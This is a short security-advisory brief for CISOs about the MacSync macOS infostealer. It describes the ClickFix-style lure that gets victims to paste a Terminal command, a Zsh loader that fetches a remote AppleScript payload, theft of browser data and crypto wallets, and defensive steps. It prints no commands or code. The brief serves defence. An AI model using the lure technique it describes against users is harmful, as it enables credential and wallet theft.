What happened
MacSync macOS infostealer leverage ClickFix-style attack by tricking victims into pasting a single command into the macOS Terminal, enabling script-based installation that bypasses typical app packaging defenses. The report described MacSync as an affordable malware-as-a-service infostealer targeting cryptocurrency users, discovered during investigation of phishing infrastructure mimicking Microsoft login pages. Victims are redirected to a fake cloud storage installer page with step-by-step Terminal instructions, and the one-line command triggers compromise while bypassing macOS protections like Gatekeeper and notarization checks because execution occurs via scripts. CloudSEK analysts were cited as analyzing the infection chain, including a daemonized Zsh loader that detaches from the Terminal session and fetches a remote AppleScript payload. The malware was described as harvesting browser profiles and targeting cryptocurrency wallet browser extensions and desktop wallets such as Exodus, Electrum, and Bitcoin Core.
Who is affected
macOS users in cryptocurrency and fintech-adjacent communities are directly affected, especially those likely to follow “manual install” instructions on phishing pages. Organizations are indirectly affected when employee endpoints are compromised and browser credential stores or session cookies are harvested for reuse against corporate services.
Why CISOs should care
Script-driven “paste this command” infections bypass many app reputation and packaging controls, shifting risk to user behavior and endpoint scripting telemetry. Infostealers that capture browser cookies and credentials can quickly translate into enterprise account compromise, persistence, and lateral movement without traditional malware binaries.
3 practical actions
- Constrain scripting and Terminal abuse: Monitor and restrict suspicious shell execution patterns, especially clipboard-to-Terminal workflows and unexpected AppleScript invocations.
- Increase endpoint detection for infostealers: Hunt for anomalous Zsh loader behavior, daemon persistence mechanisms, and outbound connections to newly registered C2 domains.
- Reduce browser credential exposure: Enforce password managers and limit stored credentials/cookies on managed devices, especially for privileged users.